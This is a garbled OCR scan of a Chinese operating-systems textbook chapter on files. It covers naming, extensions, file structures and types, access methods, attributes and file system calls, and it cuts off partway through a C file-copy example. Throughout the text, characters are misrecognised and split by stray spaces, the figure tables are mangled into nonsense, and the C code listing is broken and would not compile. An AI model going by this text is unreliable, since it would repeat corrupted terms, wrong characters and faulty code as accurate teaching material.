式 ， 也 就 是 文件 是 由 什么 组 成 的 ， 怎 样 给 文件 命名 ， 怎 样 保护 文件 ， 以 
及 可 以 对 文件 进行 哪些 操作 等 。 至 于 用 链表 还 是 用 位 图 来 记录 空闲 存储 
区 以 及 在 一 个 逻辑 磁盘 块 中 有 多 少 个 山区 等 细 市 并 不 是 用 户 所 关心 的 ， 
当然 对 文件 系统 的 设计 者 来 说 这 些 内 容 是 相当 重要 的 。 正 因为 如 此 ， 本 
章 将 分 为 几 节 讲述 ， 前 两 节 分 别 叙述 在 用 户 层面 的 关注 内 容 一 一 文件 和 
目录 ， 随 后 是 有 关 文 件 系统 实现 的 详细 讨论 ， 最 后 是 文件 系统 的 一 些 实 
例 。 














4.1 文件 





在 本 节 中， 我们 从 用 户 角 度 来 考察 文件 ， 也 就 是 次 ， 用 户 如 何 使 用 
文件 ， 文 件 具 有 哪些 特性 。 


4.1.1 文件 命名 


文件 是 一 种 抽象 机 制 ， 它 提供 了 一 种 在 磁盘 上 保留 信息 而 且 方 便 以 
后 读 取 的 方法 。 这 种 方法 可 以 使 用 户 不 用 了 解 存 储 信 息 的 方法 、 位 置 和 
实际 磁盘 工作 方式 等 有 头 细节 。 


也 许 任何 一 种 抽象 机 制 的 最 重要 的 特性 就 是 对 管理 对 象 的 命名 方 
式 ， 所 以 ， 我 们 将 从 对 文件 的 命名 开始 考察 文件 系统 。 在 进程 创建 文件 
时 ， 它 给 文件 命名 。 在 进程 终止 时 ， 该 文件 仍旧 存在 ， 并 且 其 他 进程 可 
以 通过 这 个 文件 名 对 它 进行 访问 。 





文件 的 具体 命名 规则 在 各 个 系统 中 是 不 同 的 ， 不 过 所 有 的 现代 操作 
系统 都 允许 用 1 至 8 个 字母 组 成 的 字符 串 作 为 合法 的 文件 名 。 因 此 ， 
andrea、bruce 和 cathy 都 是 合法 文件 名 。 通 常 ， 文 件 名 中 也 允许 有 数字 和 
一 些 特殊 字符 ， 所 以 像 2>、urgent! 和 Fig.2-14 也 是 合法 的 。 许 多 文件 系统 
支持 长 达 255 个 字符 的 文件 名 。 





有 的 文件 系统 区 分 大 小 写字 母 ， 有 的 则 不 区 分 。UNIX 是 前 一 类 ， 
MS-DOS 是 后 一 类 。 所 以 在 UNIX 系 统 中 maria、Maria 和 MARIA 是 三 个 
不 同 的 文件 ， 而 在 MS-DOS 中 ， 它 们 是 同一 个 文件 。 





关于 文件 系统 在 这 里 需要 插 一 句 ，Windows 95 与 Windows 98 用 的 都 
是 MS-DOS 的 文件 系统 ， 即 FAT-16， 因 此 继承 了 其 很 多 性 质 ， 例 如 有 关 
文件 名 的 构造 方法 。Windows 98 对 FAT-16 引 入 了 一 些 扩展 ， 从 而 成 为 
FAT-32， 但 这 两 者 是 很 相似 的 。 并 且 ，Windows NT、Windows 2000、 





Windows XP 和 Windows Vista 文 持 这 两 种 已 经 过 时 的 FAT 文 件 系 统 。 这 4 
个 基于 NT 的 操作 系统 有 着 一 个 目 带 文件 系统 (NTFS) ， 它 具有 很 多 不 
同 的 性 质 〈 例 如 基于 Unicode 的 文件 名 ) 。 在 本 章 中 ， 当 提 到 MS-DOS 或 
FAT 文 件 系统 的 时 候 ， 我 们 指 的 是 用 在 Windows 上 的 FAT-16 和 FAT-32， 

除非 特别 指明 。 我 们 将 晚 一 些 在 这 章 讨论 FAT 文 件 系 统 ， 并 在 第 11 章 讨 
论 NTFS， 并 细致 地 分 析 了 Windows Vista. 


许多 操作 系统 支持 文件 名 用 圆 点 隔 开 分 为 两 部 分 ， 如 文件 名 
prog.c。 圆 点 后 面 的 部 分 称 为 文件 扩展 名 (file extension) ， 文 件 扩展 名 
通常 表示 文件 的 一 些 信息 ， 如 MS-DOS 中 ， 文 件 名 由 1 至 8 个 字符 以 及 1 
至 3 个 字符 的 可 选 扩展 名 组 成 。 在 UNIX 里 ， 如 果 有 扩展 名 ， 则 扩展 名 长 
度 完全 由 用 户 决 定 ， 一 个 文件 甚至 可 以 包含 两 个 或 更 多 的 扩展 名 。 如 
homepage.html.zip， 这 里 .html 表 明 HTML 格 式 的 一 个 Web 页 面 ，.zip 表 示 
该 文件 ‘(homepage.html) 已 经 采用 zip 程 序 压 缩 过 。 一 些 常 用 文件 扩展 








名 及 其 含义 如 图 4-1 所 示 。 








扩展 名 oe A 









































































file.bak 备份 文件 

file.c “C 源 程序 文件 

file.gif 符合 图 形 交 换 格式 的 图 像 文件 

file.hlp 帮助 文件 

file.html | WWW 超 文本 标记 语言 文档 | 
| file.jpg 符合 JPEG 编 码 标准 的 静态 图 片 

file.mp3 符合 MP3 音 频 编 码 格式 的 音乐 文件 

| file.mpg 符合 MPEG 编 码 标准 的 电影 

file. 目标 文件 (编译 器 输出 格式 ， 尚 未 连接 ) | 
file.pdf pdf 格 式 的 文件 

file.ps PostScript 文 件 

file.tex 为 TEX 格 式 化 程序 准备 的 输入 文件 

file.txt ”| 一 般 正文 文件 

file.zip 压缩 文件 








图 41 一 些 典 型 的 文件 扩展 名 





在 茶 些 系统 中 《如 UNIX) ， 文 件 扩展 名 只 是 一 种 约定 ， 操 作 系统 
并 不 强迫 采用 它 。 名 为 file.txt 的 文件 也 许 是 文本 文件 ， 这 个 文件 名 在 于 
提醒 所 有 者 ， 而 不 是 表示 传送 什么 信息 给 计算 机 。 但 是 为 一 方面 ，C 编 
译 絮 可 能 要 求 它 编 译 的 文件 以 .c 结 尾 ， 否 则 它 会 拒绝 编译 。 





对 于 可 以 处 理 多 种 类 型 文件 的 某 个 程序 ， 这 类 约定 是 特别 有 用 的 。 
例如 ，C 编 译 器 可 以 编译 、 连 接 多 种 文件 ， 包 括 C 文 件 和 汇编 语言 文 





件 。 这 时 扩展 名 就 很 必要 ， 编 译 器 利用 它 区 分 哪些 是 C 文 件 ， 哪 些 是 汇 
编 文件 ， 哪 些 是 其 他 文件 。 


相反 ，Windows 对 扩展 名 赋予 含义 。 用 户 〈 或 进程 ) 可 以 在 操作 系 
统 中 注册 扩展 名 ， 并 且 规 定 哪 个 程序 “拥有 ?该 扩展 名 。 当 用 户 双击 某 个 
文件 名 时 , “拥有 ”该 文件 扩展 名 的 程序 就 启动 并 运行 该 文件 。 例 如 ， 双 
击 file.doc 启 动 了 Microsoft Word 程 序 ， 并 以 file.doc 作 为 待 编辑 的 初始 文 
件 。 








4.1.2 ”文件 结构 


文件 可 以 有 多 种 构造 方式 ， 在 图 4-2 中 列 出 了 常用 的 三 种 方式 。 图 4- 
2a 中 的 文件 是 一 种 无 结构 的 字 节 序列 ， 操 作 系 统 事实 上 不 知道 也 不 关心 
文件 内 容 是 什么 ， 操 作 系 统 所 见 到 的 就 是 字 节 ， 其 任何 含义 只 在 用 户 程 
序 中 解释 。 在 UNIX 和 Windows 中 都 采用 这 种 方法 。 


1 个 字 节 ”1 个 记录 





| cat | cow | pog | [Goat] tion | ow | [Pony | Rat [worm] 





[re oe [an] 


a) b) c) 


图 4-2 三 种 文件 结构 : a PPAR; 了) 记录 序列 ; CM 


把 文件 看 成 字 市 序列 为 操作 系统 提供 了 最 大 的 灵活 性 。 用 户 程 序 可 
以 同文 件 中 加 入 任何 内 容 ， 并 以 任何 方便 的 形式 命名 。 操 作 系 统 不 提供 
任何 帮助 ， 但 也 不 会 构成 阻碍 。 对 于 想 做 特殊 操作 的 用 户 来 说 ， 后 者 是 
非常 重要 的 。 所 有 UNIX、MS-DOS 以 及 Windows 都 采用 这 种 文件 模型 。 





图 4-2b 表 示 在 文件 结构 上 的 第 一 步 改进 。 在 这 个 模型 中 ， 文 件 是 具 
有 固定 长 上 度 记 录 的 厅 列 ， 每 个 记录 都 有 其 内 部 结构 。 把 文件 作为 记录 序 
列 的 中 心思 想 是 ， 读 操作 返回 一 个 记录 ， 而 写 操作 重 写 或 退 加 一 个 记 
录 。 这 里 对 “记录 ?给予 一 个 历史 上 的 说 明 ， 几 十 年 前 ， 当 80 列 的 穿孔 卡 
片 还 是 主流 的 时 候 ， 很 多 《大 型 机 ) 操作 系统 把 文件 系统 建立 在 由 80 个 
字符 的 记录 组 成 的 文件 基础 之 上。 这些 操作 系统 也 支持 132 个 字符 的 记 
录 组 成 的 文件 ， 这 是 为 了 适应 行 式 打印 机 《当时 的 行 式 打印 机 有 132 列 
W) 。 程 序 以 80 个 字符 为 单位 读 入 数据 ， 并 以 132 个 字符 为 单位 写 数 
据 ， 其 中 后 和 面 52 个 字符 都 是 空格 。 现 在 已 经 没有 以 这 种 方式 工作 的 通用 
系统 了 ， 但 是 在 80 列 穿孔 卡片 和 132 列 宽 行 式 打 印 机 流行 的 日 子 里 ， 这 
是 大 型 计算 机 系统 中 的 常见 模式 。 

















第 三 种 文件 结构 如 图 4-2c 所 示 。 文 件 在 这 种 结构 中 由 一 村 记 录 树 构 
成 ， 每 个 记录 并 不 具有 同样 的 长 度 ， 而 记录 的 固定 位 置 上 有 一 个 “ 键 ” 字 
段 。 这 棵 树 按 “ 键 ?字段 进行 排序 ， 从 而 可 以 对 特定 “ 键 ? 进 行 快速 得 找 。 























里 然 在 这 类 结构 中 取 “ 下 一 个 ”记录 是 可 以 的 ， 但 是 基本 操作 并 不 是 
取 “ 下 一 个 ”记录 ， 而 是 获得 具有 特定 键 的 记录 。 如 图 4-2c 中 的 文件 zo0， 
用 户 可 以 要 求 系统 取 键 为 pony 的 记录 ， 而 不 必 关 心 记录 在 文件 中 的 确切 
位 置 。 进 而 ， 可 以 在 文件 中 添加 新 记录 。 但 是 ， 把 记录 加 在 文件 的 什么 
位 置 是 由 操作 系统 而 不 是 用 户 决 定 的 。 这 类 文件 结构 与 UNIX 和 
Windows 中 采用 的 无 结构 字 节 流明 显 不 同 ， 但 它 在 一 些 处 理 商业 数据 的 




















大 型 计算 机 中 获得 广泛 使 用 。 


4.1.3 ”文件 类 型 


很 多 操作 系统 支持 多 种 文件 类 型 。 如 UNIX 和 Windows 中 都 有 普通 
文件 和 目录 ，UNIX 还 有 字符 特殊 文件 (character special file) FIRFIR 
文件 (block special file) 。 普 通 文件 (regular file〉 中 包含 有 用 户 信 
息 。 图 4-2 中 的 所 有 文件 都 是 普通 文件 。 目 录 (directory〉 是 管理 文件 系 
统 结构 的 系统 文件 ， 将 在 以 后 的 章节 中 讨论 。 字 符 特殊 文件 和 输入 / 输 
出 有 关 ， 用 于 串 行 WO 类 设备 ， 如 终端 ”打印 机 、 网 络 等 。 块 特殊 文件 
用 于 磁盘 类 设备 。 本 章 主 要 讨论 普通 文件 。 





普通 文件 一 般 分 为 ASCII 文 件 和 二 进 制 文件 。ASCII 文 件 由 多 行 正 
文 组 成 。 在 某 些 系统 中 ， 每 行 用 回 车 符 结 束 ， 其 他 系统 则 用 换行 符 结 
束 。 有 些 系 统 还 同时 采用 回 车 符 和 换行 符 〈 如 MS-DOS) 。 文 件 中 各 行 
的 长 度 不 一 定 相同 。 





ASCII 文 件 的 最 大 优势 是 可 以 显示 和 打印 ， 还 可 以 用 任何 文本 编辑 
器 进行 编辑 。 再 者 ， 如 果 很 多 程序 都 以 ASCII 文 件 作 为 输入 和 输出 ， 就 
很 容易 把 一 个 程序 的 输出 作为 另 一 个 程序 的 输入 ， 如 shell 管 道 一样 。 
《用 管道 实现 进程 间 通 信 并 非 更 容易 ， 但 知 以 一 种 公认 的 标准 《如 
ASCII 码 ) 来 表示 ， 则 更 易于 理解 一 些 。) 








其 他 与 ASCII 文 件 不 同 的 是 二 进 制 文件 。 打 印 出 来 的 二 进 制 文件 是 


无 法 理解 的 、 充 满 混 乱 字符 的 一 张 表 。 通 常 ， 二 进 制 文件 有 一 定 的 内 部 
结构 ， 使 用 该 文件 的 程序 才 了 解 这 种 结构 。 


如 图 4-3a 是 一 个 简单 的 可 执行 二 进 制 文 件 ， 它 取 自 某 个 版 本 的 
UNIX。 尽 管 这 个 文件 只 是 一 个 字 节 序列 ， 但 只 有 文件 的 格式 正确 时 ， 
操作 系统 才 会 执行 这 个 文件 。 这 个 文件 有 五 个 段 : 文件 头 、 正 文 、 数 
据 、 重 定位 位 及 符号 表 。 文 件 头 以 所 谓 的 魔 数 (magic number) 开始 ， 
表明 该 文件 是 一 个 可 执行 的 文件 《防止 非 这 种 格式 的 文件 偶然 运行 ) 。 
魔 数 后 面 是 文件 中 各 段 的 长 度 、 执 行 的 起 始 地 址 和 一 些 标志 位 。 程 序 本 
号 的 正文 和 数据 在 文件 头 后 面 。 这 些 被 装 入 内 存 ， 并 使 用 重 定 位 位 重新 
定位 。 符 号 表 则 用 于 调试 。 














= 模块 名 称 


符号 表 长 度 
YM 





日 期 


文件 头 


目标 模块 所 有 者 
保护 


大 小 





目标 模块 





目标 模块 





a) b) 


图 4-3 一 个 可 执行 文件 ; D) 一 个 存档 文件 








二 进 制 文件 的 第 二 个 例子 是 UNIX 的 存档 文件 ， 它 由 已 编译 但 没有 
连接 的 库 过 程 〈 模 块 ) 集合 而 成 。 每 个 文件 以 模块 头 开 始 ， 其 中 记录 了 
名 称 、 创 建 日 期 、 所 有 者 、 保 护 码 和 文件 大 小 。 该 模块 头 与 可 执行 文件 
一 样 ， 也 都 是 二 进 制 数字 ， 打 印 输出 它们 坚 无 意义 。 


所 有 操作 系统 必须 能 够 识别 它们 目 己 的 可 执行 文件 的 文件 类 型 ， 其 





中 有 些 操作 系统 还 可 识别 更 多 的 信息 。 一 种 老式 的 TOPS-20 操 作 系 统 
(用 于 DECsystem20 计 算 机 〉 甚 至 可 检查 可 执行 文件 的 创建 时 间 ， 然 
后 ， 它 可 以 找到 相应 的 源 文件 ， 看 它 在 二 进 制 文件 生成 后 是 否 被 修改 
过 。 如 果 修 改过 ， 操 作 系统 目 动 重 新 编译 这 个 文件 。 在 UNIX 中 ， 就 是 
在 shell 中 供 入 make 程 序 。 这 时 操作 系统 要 求 用 户 必须 采用 固定 的 文件 扩 
展 名 ， 从 而 确定 哪个 源 程 序 生成 哪个 二 进 制 文件 。 








如 采用 户 执行 了 系统 设计 者 没有 考 碟 到 的 茶 种 操作 ， 这 种 强制 类 型 
的 文件 有 可 能 会 引起 抹 烦 。 比 如 在 一 个 系统 中 ， 程 序 输出 文件 的 扩展 名 
是 .dat〔 数 据 文件 ) ， 知 用 户 写 一 个 格式 化 程序 ， 读 入 .c《〈C 程 序 ) 文件 
并 转换 它 《〈《 比 如 把 该 文件 转换 成 标准 的 首 行 缩 进 ) ， 再 把 转换 后 的 文件 
以 .dat 关 型 输出 。 如 采用 户 试图 用 C 编 译 器 来 编译 这 个 文件 ， 因 为 文件 扩 
展 名 不 对 ，C 编 译 占 会 拒绝 编译 。 硝 想 把 fe.dat 复 制 到 file.c 也 不 行 ， 因 
为 系统 会 认为 这 是 无 效 的 复制 (防止 用 户 错 误 )〉。 





尽管 对 初学 者 而 言 ， 这 类 “保护 ”是 有 利 的 ， 但 一 些 有 经 验 的 用 户 却 
感到 很 烦恼 ， 因 为 他 们 要 花 很 多 精力 来 适应 操作 系统 对 合理 和 不 合理 操 
作 的 划分 。 





4.1.4 文件 存 取 





早期 操作 系统 只 有 一 种 文件 存 取 方 式 : 顺序 存 取 Csequential 
access) 。 进 程 在 这 些 系统 中 可 从 头 顺序 读 取 文 件 的 全 部 字 贡 或 记录 ， 
但 不 能 跳 过 茶 一 些 内 容 ， 也 不 能 不 按 顺 序 读 取 。 顺 序 存 取 文 件 是 可 以 返 
回 到 起 点 的 ， 需 要 时 可 多 次 读 取 该 文件 。 在 存储 介质 是 磁带 而 不 是 磁盘 
时 ， 顺 序 存 取 文 件 是 很 方便 的 。 











当 用 磁盘 来 存储 文件 时 ， 我 们 可 以 不 按 顺 序 地 读 取 文 件 中 的 字 节 或 
记录 ， 或 者 按照 关键 字 而 不 是 位 置 来 存 取 记录 。 这 种 能 够 以 任何 次 序 读 
取 其 中 字 市 或 记录 的 文件 称 作 随机 存 取 文 件 (random access file) 。 许 
多 应 用 程序 需要 这 种 类 型 的 文件 。 

















随机 存 取 文 件 对 很 多 应 用 程序 而 言 是 必 不 可 少 的 ， 如 数据 库 系统 。 
如 果 乘 客 打 电话 预订 茶 航 班机 票 ， 订 票 程序 必须 能 直接 存 取 该 航班 记 
录 ， 而 不 必 先 读 出 其 他 航班 的 成 二 上 万 个 记录 。 





有 两 种 方法 可 以 指示 从 何 处 开始 读 取 文件 。 一 种 是 每 次 read 操 作 都 
给 出 开始 读 文 件 的 位 置 。 为 一 种 是 用 一 个 特殊 的 seek 操 作 设 置 当前 位 
置 ， 在 seek 操 作 后 ， 从 这 个 当前 位 置 顺序 地 开始 读 文件 。UNIX 和 
Windows 使 用 的 是 后 一 种 方法 。 


4.1.5 文件 属性 


文件 都 有 文件 名 和 数据 。 另 外 ， 所 有 的 操作 系统 还 会 保存 其 他 与 文 
件 相 关 的 信息 ， 如 文件 创建 的 日 期 和 时 间 、 文 件 大 小 等 。 这 些 附加 信息 
称 为 文件 属性 Cattribute) ， 有 些 人 称 之 为 元 数据 (metadata) 。 文 件 的 
属性 在 不 同系 统 中 差别 很 大 。 一 些 常 用 的 属性 在 图 4-4 中 列 出 ， 但 还 存 
在 其 他 的 属性 。 没 有 一 个 系统 具有 所 有 这 些 属性 ， 但 每 种 属性 都 在 东 种 
系统 中 采用 。 











属性 







谁 可 以 存 取 文 件 ， 以 什么 方式 存 取 文 件 

创建 者 
所 有 者 
只 读 标 志 0 表示 读 / 写 ; 1 表示 只 读 

隐藏 标志 0 表示 正常 ，1 表 示 不 在 列表 中 显示 

系统 标志 0 表示 普通 文件 ，1 表 示 系 统 文件 
存档 标志 0 表示 已 经 备份 ，1 表 示 需 要 备份 
ASCII/ 二 进 制 0 表示 ASCII 码 文件 ;1 表示 二 进 制 文件 

随机 存 取 标志 0 表示 只 允许 顺序 存 取 ; 1 表示 随机 存 取 

临时 标志 0 表示 正常 ，1 表 示 进 程 退 出 时 删除 该 文件 
加 颌 标志 
记录 长 度 一 个 记录 中 的 字 节 数 


键 的 位 置 每 个 记录 中 键 的 偏 移 量 





















标志 
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=R A> | St 
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键 的 长 度 键 字段 的 字数 
创建 时 间 文件 创建 的 日 期 和 时 间 
最 后 一 次 存 取 时 间 | 文件 上 一 次 存 取 的 日 期 和 时 间 


最 后 一 次 修改 时 间 | 文件 上 一 次 修改 的 日 期 和 时 间 
当前 大 小 文件 的 字 节 数 
Ñ 文件 可 能 增长 到 的 字 节 数 









il 
SH 
ys 
ke 





图 44 一 些 常用 的 文件 属性 








前 4 个 属性 与 文件 保护 相关 ， 它 们 指出 了 谁 可 以 存 取 这 个 文件 ， 谁 
不 能 存 取 这 个 文件 。 有 各 种 不 同 的 文件 保护 方案 ， 其 中 一 些 保护 方案 以 
后 会 讨论 。 在 一 些 系统 中 ， 用 户 必 须 给 出 口令 才能 存 取 文 件 。 此 时 ， 口 
令 也 必须 是 文件 属性 之 一 。 





标志 是 一 些 位 或 短 的 字段 ， 用 于 控制 或 局 用 东 坚 特殊 属性 。 例 如 ， 
隐藏 文件 不 在 文件 列表 中 出 现 。 存 档 标 志 位 用 于 记录 文件 是 否 备份 过 
由 备份 程序 清除 该 标志 位 ， 夺 文件 被 修改 ， 操 作 系 统 则 设置 该 标志 位 。 
用 这 种 方法 ， 备 份 程序 可 以 知道 哪些 文件 需要 备份 。 临 时 标志 表明 当 创 
建 该 文件 的 进程 终止 时 ， 文 件 会 被 自动 删除 。 


记录 长 度 、 键 的 位 置 和 键 的 长 度 等 字段 只 能 出 现在 用 关键 字 奉 找 记 
录 的 文件 里 ， 它 们 提供 了 和 碍 找 关 键 字 所 需 的 信息 


时 间 字 段 记 录 了 文件 的 创建 时 间 、 最 近 一 次 存 取 时 间 以 及 最 后 一 次 
修改 时 间 ， 它 们 的 作用 不 同 。 例 如 ， 目 标 文件 生成 后 被 修改 的 源 文件 需 
要 重新 编译 生成 目标 文件 。 这 些 字 有 段 所 供 了 必要 的 信息 。 


当前 大 小 字段 指出 了 当前 的 文件 大 小 。 在 一 些 老式 大 型 机 操作 系统 
中 创建 文件 时 ， 要 给 出 文件 的 最 大 长 度 ， 以 便 操作 系统 事先 控 最 大 长 度 
留 出 存储 空间 。 工 作 站 和 和 个 人 计算 机 中 的 操作 系统 则 聪明 多 了 ， 不 需 


Bx 点 提示 。 











4.1.6 文件 操作 





使 用 文件 的 目的 是 存储 信息 并 方便 以 后 的 检索 。 对 于 存储 和 检索 ， 
不 同系 统 提供 了 不 同 的 操作 。 以 下 是 与 文件 有 关 的 最 常用 的 一 些 系统 调 
用 : 


1)create。 创 建 不 包含 任何 数据 的 文件 。 该 调用 的 目的 是 表示 文件 
即将 建立 ， 并 设置 文件 的 一 些 属性 。 


2)delete。 当 不 再 需要 某 个 文件 时 ， 必 须 删 除 该 文件 以 释放 磁盘 空 
间 。 任 何 文件 系统 总 有 一 个 系统 调用 用 来 删除 文件 。 


3)open。 在 使 用 文件 之 前 ， 必 须 先 打开 文件 。open 调 用 的 目的 是 : 
把 文件 属性 和 磁盘 地 址 表 装 入 内 存 ， 便 于 后 续 调 用 的 快速 存 取 。 


4)close。 存 取 络 束 后 ， 不 再 需要 文件 属性 和 磁盘 地 址 ， 这 时 应 该 天 
闭 文 件 以 释放 内 部 表 空间 。 很 多 系统 限制 进程 打开 文件 的 个 数 ， 以 惑 励 
用 户 关 闭 不 再 使 用 的 文件 。 磁 盘 以 块 为 单位 写 入 ， 关 闭 文件 时 ， 写 入 该 
文件 的 最 后 一 块 ， 即 使 这 个 块 还 没有 满 。 








5)read。 在 文件 中 读 取 数据 。 一 般 地 ， 读 出 数据 来 自 文件 的 当前 位 
置 。 调 用 者 必须 指明 需要 读 取 多 少数 据 ， 并 且 提 供 存 放 这 些 数据 的 缓冲 
区 。 


6)write。 癌 文件 写 数据 ， 写 操作 一 般 也 是 从 文件 当前 位 置 开 始 。 如 
果 当 前 位 置 是 文件 末尾 ， 文 件 长 度 增 加 。 如 有 果 当 前 位 置 在 文件 中 间 ， 则 
MAZEE tt,» FFA AER. 











7)append。 此 调用 是 write 的 限制 形式 ， 它 只 能 在 文件 末尾 添加 数 
据 。 大 系统 只 提供 最 小 系统 调用 集合 ， 则 通常 没有 append。 很 多 系统 对 
同一 操作 提供 了 多 种 实现 方法 ， 这 些 系统 中 有 时 有 append 调 用 。 


8)seek。 对 于 随机 存 取 文件 ， 要 指定 从 何 处 开始 取 数 据 ， 通 常 的 方 
法 是 用 seek 系 统 调用 把 当前 位 置 指针 指 同 文件 中 特定 位 置 。seek 调 用 结 
束 后 ， 就 可 以 从 该 位 置 开 始 读 写 数据 了 。 








9)get attributes。 进 程 运行 常 需要 读 取 文件 属性 。 例 如 ，UNIX 中 
make 程 序 通常 用 于 管理 由 多 个 源 文件 组 成 的 软件 开发 项 目 。 在 调用 
make 时 ， 检 查 全 部 源 文件 和 目标 文件 的 修改 时 间 ， 实 现 最 小 编译 ， 使 得 
全 部 文件 都 为 最 新 版 本 。 为 达到 此 目的 ， 需 要 查找 文件 的 某 一 些 属性 ， 
特别 是 修改 时 间 。 








10)set attributes。 某 些 属性 是 可 由 用 户 设 置 的 ， 在 文件 创建 之 后 ， 
用 户 还 可 以 通过 系统 调用 set attributes 来 修改 它们 。 保 护 模 式 信 息 是 一 个 
显著 的 例子 ， 大 多 数 标 志 也 属于 此 类 属性 。 











11)rename。 用 户 常 常 要 改变 已 有 文件 的 名 字 ，rename 系 统 调用 用 
于 这 一 目的 。 严 格 地 说 ， 设 置 这 个 系统 调用 不 是 十 分 必要 的 ， 因 为 可 以 


先 把 文件 复制 到 一 个 新 文件 名 的 文件 中 ， 然 后 删除 原来 的 文件 。 


4.1.7 ”使 用 文件 系统 调用 的 一 个 示例 程序 


本 节 会 考察 一 个 简单 的 UNIX 程 序 ， 它 把 文件 从 源 文件 处 复制 到 目 
标 文件 处 。 程 序 清单 如 图 4-5 所 示 。 该 程序 的 功能 很 简单 ， 甚 至 没有 考 
虚 出 错 报告 处 理 ， 但 它 给 出 了 有 关 文 件 的 系统 调用 是 怎样 工作 的 一 般 思 
路 。 





例如 ， 通 过 下 面 的 命令 行 可 以 调用 程序 copyfile: 








copyfile abc xyz 





把 文件 abc 复 制 到 xyz。 如 果 xyz 已 经 存在 ，abc 会 尾 新 它 。 否 则 ， 就 
创建 它 。 程 序 调 用 必须 提供 两 个 参数 ， 它 们 都 是 合法 的 文件 名 。 第 一 个 
是 源 文件 ， 第 二 个 是 输出 文件 。 


在 程序 的 开 尖 是 四 个 #include 语 句 ， 它 们 把 大 量 的 定义 和 函数 原型 
包含 在 这 个 程序 。 为 了 使 程序 遵守 相应 的 国际 标准 ， 这 些 是 需要 的 ， 无 
须 作 进一步 的 讨论 。 接 下 来 一 行 是 main 函 数 的 原型 ， 这 是 ANSI C 所 必 
再 的 ， 但 对 我 们 的 目的 而 言 ， 它 也 不 是 重点 。 


接 下 来 的 第 一 个 #define 语 句 是 一 个 宏 定 义 ， 它 把 BUF_SIZE 字 符 串 
定义 为 一 个 宏 ， 其 数值 为 4096。 程 序 会 读 写 若干 个 有 4096 个 字 节 的 块 。 
类 似 地 ， 给 常数 一 个 名 称 而 且 用 这 一 名 称 代 替 常 数 是 一 种 良好 的 编程 习 








惯 。 这 样 的 习惯 不 仅 使 程序 易 读 ， 而 且 使 程序 易于 维护 。 第 二 个 #define 
语句 决定 谁 可 以 访问 输出 文件 。 


主 程序 名 为 main， 它 有 两 个 参数 : argc 和 argv。 当 调用 这 个 程序 
时 ， 操 作 系统 提供 这 两 个 参数 。 第 一 个 参数 表示 在 调用 该 程序 的 命令 行 
中 包含 多 少 个 字符 串 ， 包 括 该 程序 名 。 它 应 该 是 3。 第 二 个 参数 是 指向 
程序 参数 的 指针 数组 。 在 上 面 的 示例 程序 中 ， 这 一 数组 的 元 素 应 该 包含 
指向 下 列 值 的 指针 : 








argv[0]="copyfile" 
argv[1l]="abc" 
argv[2]="xyz" 


正 是 通过 这 个 数组 ， 程 序 访问 其 参数 。 





声明 了 五 个 变量 。 前 面 两 个 Cin_fd#llout_fd) 用 来 保存 文件 描述 
符 ， 即 打开 一 个 文件 时 返回 一 个 小 整数 。 后 面 两 个 (rd_count 和 
wt_count) 分 别 是 由 read 和 write 系统 调用 所 返回 的 字 节 计数 。 最 后 一 个 
(buffer) 是 用 于 保存 所 读 出 的 数据 以 及 提供 写 入 数据 的 缓冲 区 。 


RAT Enis ais Barge, A CERES. WRN, EVA 
退出 。 任 何 非 0 的 状态 码 均 表示 出 错 。 在 本 程序 中 ， 状 态 码 是 惟一 的 出 
错 报告 处 理 。 一 个 程序 的 产品 版 通常 会 打印 出 错 信息 。 





接着 我 们 试图 打开 源 文件 并 创建 目标 文件 。 如 果 源 文件 成 功 打开 ， 


系统 会 给 in_fd 赋 了 予 一 个 小 的 整数 ， 用 以 标识 源 文 件 。 后续 的 调用 必须 引 
用 这 个 整数 ， 使 系统 知道 需要 的 是 哪 一 个 文件 。 类 似 地 ， 如 果 目 标 文件 
也 成 功 地 创建 了 ，out_fd 会 被 赋予 一 个 标识 用 的 值 。create 的 第 二 个 变量 
是 设置 保护 模式 。 如 果 打 开 或 创建 文件 失败 ， 对 应 的 文件 描述 符 被 设 
为 -1， 程 序 融 着 出 错 码 退出 。 





接 下 来 是 用 来 复制 文件 的 循环 。 一 开始 试图 读 出 4KB 数 据 到 buffer 
中 。 它 通过 调用 库 过 程 read 来 完成 这 项 工作 ， 该 过 程 实 际 激 活 了 read 系 
统 调用 。 第 一 个 参数 标识 文件 ， 第 二 个 参数 指定 缓冲 区 ， 第 三 个 参数 指 
定 读 出 多 少 字 节 。 赋 予 rd_count 的 字 节 数 是 实际 所 读 出 的 字 节 数 。 通 党 
这 个 数 是 4096， 除 非 文 件 中 只 有 少量 字 节 。 当 到 达 文 件 尾 部 时 ， 该 参数 
的 值 是 (。 如 果 rd_count 是 零 或 负数 ， 复 制 工作 就 不 能 再 进行 下 去 ， 所 以 
执行 break 语 句 ， 用 以 中 断 循 环 〈 人 否则 就 无 法 结束 了 ) 。 











调用 write 把 绥 冲 区 的 内 容 输出 到 目标 文件 中 去 。 第 一 个 参数 标识 文 
件 ， 第 二 个 参数 指定 缓冲 区 ， 第 三 个 参数 指定 写 入 多 少 字 节 ， 同 read 类 
似 。 注 意 字 市 计数 是 实际 读 出 的 字 节 数 ， 不 是 BUF_SIZE。 这 一 点 是 很 
重要 的 ， 因 为 最 后 一 个 缓冲 区 一 般 不 会 是 4096， 除 非 文 件 长 度 碰巧 是 
4KB 的 倍数 。 











当 整 个 文件 处 理 完 时 ， 超 出 文件 尾部 的 首次 调用 会 把 0 值 返 回 给 
rd_count， 这 样 ， 程 序 会 退出 循环 。 此 时 ， 关 闭 两 个 文件 ， 程 序 退 出 并 
附 有 正常 完成 的 状态 码 。 


尽管 Windows 的 系统 调用 与 UNIX 的 系统 调用 不 同 ， 但 是 windows 程 
序 复制 文件 的 命令 行 的 一 般 结 构 与 图 4-5 中 的 相当 类 似 。 我 们 将 在 第 11 
章 中 考察 Windows Vista 的 系统 调用 。 


/* 复制 文件 程序 ， 有 基本 的 错误 检查 和 错误 报告 */ 

#include <sys/types.h> 谍 包 括 必要 的 头 文件 */ 
#include <fcntl.h> 

#include <stdlib.h> 

#include <unistd.h> 

int main(int argc, char *argv[]); /* ANSI 原 型 */ 


#define BUF_SIZE 4096 /* 使 用 一 个 4096 字 节 大 小 的 缓冲 区 */ 
#define OUTPUT_MODE 0700 上 输出 文件 的 保护 位 */ 


int main(int argc, char *argv[]) 


int in_fd, out_fd, rd_count, wt_count; 
char buffer[BUF _ SIZE]; 


if (argc != 3) exit(1); /* 如 果 argc 不 等 于 3， 语 法 错 */ 
1 打开 输入 文件 并 创建 输出 文件 */ 


in_fd = open(argv[1], O_ RDONLY); i J 开源 文 Atal 
